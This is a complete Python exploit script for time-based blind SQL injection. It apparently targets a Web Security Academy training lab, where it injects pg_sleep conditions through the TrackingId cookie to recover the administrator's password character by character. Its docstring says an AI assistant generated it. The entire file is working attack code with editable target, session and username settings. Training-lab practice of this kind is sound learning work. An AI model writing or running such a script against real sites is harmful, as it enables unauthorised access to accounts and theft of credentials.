#!/usr/bin/env python3
"""
Time-based blind SQL injection password cracker - v3
- Wider charset (upper+lower+digits)
- Double-checks each hit to avoid false positives from network jitter

Note: this script was generated by Claude (AI) based on a description of
the extraction technique - not hand-written.
"""

import requests
import time
import string

# ---------- CONFIG: EDIT THESE ----------
TARGET = "https://0a38003b0336d22685cb2c2d005100d4.web-security-academy.net/"
TRACKING_ID_PREFIX = "RqdYP9mGVkPjmvEk"
SESSION_ID = "iuQlSjnP5B0yoheaaAIIVX8QnoliwxrV"   # <-- refresh if the run breaks partway
USERNAME = "administrator"
PASSWORD_LENGTH = 20  # confirmed via LENGTH() enumeration
SLEEP_TIME = 10        # matches pg_sleep(10)
THRESHOLD = 7           # response time above this = TRUE
CHARSET = string.ascii_letters + string.digits   # upper + lower + digits
# -----------------------------------------


def is_true(condition):
    payload = (
        f"{TRACKING_ID_PREFIX}'||(select case when ({condition}) "
        f"then pg_sleep({SLEEP_TIME}) else pg_sleep(-1) end from users)--"
    )
    cookies = {
        "TrackingId": payload,
        "session": SESSION_ID,
    }
    try:
        start = time.time()
        requests.get(TARGET, cookies=cookies, timeout=SLEEP_TIME + 10)
        elapsed = time.time() - start
    except requests.exceptions.RequestException:
        return False
    return elapsed > THRESHOLD


def is_true_confirmed(condition):
    """Only trust a TRUE result if it happens twice in a row (kills false positives)."""
    if not is_true(condition):
        return False
    return is_true(condition)


def crack_character(position):
    for char in CHARSET:
        safe_char = char.replace("'", "''")
        condition = (
            f"username='{USERNAME}' and "
            f"substring(password,{position},1)='{safe_char}'"
        )
        print(f"  position {position}: trying '{char}'...", end="\r")
        if is_true_confirmed(condition):
            print(f"  position {position}: '{char}' <-- FOUND (confirmed)         ")
            return char
    print(f"  position {position}: NOT FOUND in charset          ")
    return "?"


def main():
    print(f"Cracking password for user '{USERNAME}'...")
    print(f"Target: {TARGET}")
    print(f"Password length: {PASSWORD_LENGTH}")
    print(f"Charset size: {len(CHARSET)} chars\n")

    password = ""
    for pos in range(1, PASSWORD_LENGTH + 1):
        char = crack_character(pos)
        password += char
        print(f"Progress so far: {password}\n")

    print("=" * 40)
    print(f"FINAL PASSWORD: {password}")
    print("=" * 40)


if __name__ == "__main__":
    main()
